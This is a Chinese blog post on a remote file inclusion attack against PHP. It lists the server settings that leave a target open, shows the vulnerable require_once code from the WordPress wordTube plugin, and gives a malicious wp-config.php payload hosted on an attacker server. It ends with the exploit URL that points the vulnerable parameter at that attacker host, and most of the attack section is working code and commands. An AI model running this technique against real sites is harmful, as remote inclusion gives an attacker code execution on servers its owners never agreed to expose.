zoukankan      html  css  js  c++  java
  • 修改部分php配置实现 远程包含 攻击

     
    1. 调试期间,可以打开display_errors = On
    2. 目标机使用了include、require或require_once
    3. 目标机配置
      a) register_globals = On
      b) allow_url_fopen = On
      c) allow_url_include = On
    这样的目标就可以进行攻击了
     
    自己搭建简易的服务器,apache + php 即可
    修改httpd.conf中,将后缀为php的,从而避免代码在攻击端就被执行,
    #AddType application/x-httpd-php .php .html .htm
     
    根据漏洞代码,生成对应的环境,例如:
    if (!$_POST) $wppath=$_GET['wpPATH'];
    else $wppath=$_POST['wpPATH'];
    require_once($wppath.'/wp-config.php');
     
    我们就可以建立一个可访问的文件夹bad_guy,
    增加读权限order allow,deny allow from all ,
    然后在里面新建一个wp-config.php
    <?php
            mkdir('c:\exploit');
            phpinfo();
            exit;
    ?>

    ~然后请求一下就行了

    /wordpress/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://10.67.1.30/bad_guy

    来张效果图:

  • 相关阅读:
    第五章 Mybatis注解
    第四章 Mbatis高级查询
    第三章 Mybatis动态Sql
    第二章 Mybatis映射文件
    第一章 初识Mybatis
    Mybatis大纲设计
    项目总结
    第二周项目功能实现
    第一周项目功能实现
    客车网上售票系统需求分析
  • 原文地址:https://www.cnblogs.com/amaoxiaozhu/p/2876194.html
Copyright © 2011-2022 走看看